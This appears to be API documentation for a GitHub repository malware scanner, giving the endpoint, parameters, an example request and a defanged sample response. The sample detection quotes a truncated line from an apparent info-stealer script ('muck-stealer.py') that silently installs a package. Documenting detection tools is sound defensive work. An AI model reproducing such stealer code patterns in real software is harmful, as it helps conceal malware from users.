GitHub Repo Scanner

This endpoint scans a specified GitHub repository for potentially malicious code. It identifies risky executions, known encrypted payloads, obfuscated scripts and common malware patterns.

The API provides detailed detections with file names, line numbers, and decoded content (if applicable).

This API is for non-commercial use. If you would like to use it in a commercial product or in a way that generates revenue, please contact me at [email protected]. The service is not designed to scale for commercial demands, and I want to maintain a high quality of service for existing users.

Endpoint

https://api.elliott.diy/v1/malware/github?repo=<GitHub_Repo_Owner>/<Repo_Name>

Request Parameters

Parameter
Type
Required
Description

repo

string

✅ Yes

The GitHub repository to scan, formatted as <owner>/<repo>.

Example Request

curl "https://api.elliott.diy/v1/malware/github?repo=grobarqxd6996/Discord-Boost-Tool"

Response Format

  • Content-Type: application/json

  • Status Codes:

    • 200 OK: Successfully analyzed the repository.

    • 400 Bad Request: Invalid or missing repository name.

    • 500 Internal Server Error: An error occurred during analysis.

Example Response (Defanged) 

{
  "detections": [
    {
      "file": "muck-stealer.py",
      "line": 22,
      "content": "import subprocess; subprocess.run(['pip', 'install', 'cryptography'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); ...",
      "decoded": null
    }
  ],
  "urls": null,
  "suspicious": true
}

Response Fields

Field
Type
Description

detections

Array

List of detected suspicious code patterns.

file

String

Name of the file where the detection occurred.

line

Integer

Line number where the suspicious content was found.

content

String

Snippet of the detected code.

decoded

String or null

Decoded content if applicable.

urls

Array or null

Extracted URLs (if any).

suspicious

Boolean

Indicates whether the repository contains potentially malicious code.

Usage Notes

  • The API flags suspicious patterns but does not guarantee accuracy—manual review is recommended.

  • If decoded is null, the script may contain encrypted or obfuscated code that requires further analysis.

  • If the payload is heavily obfuscated the API may fail due to internal database constraints.

  • Designed to help detect malware, info stealers, and automated threats in repositories.

PreviousImage GenerationNextSupported Providers

Last updated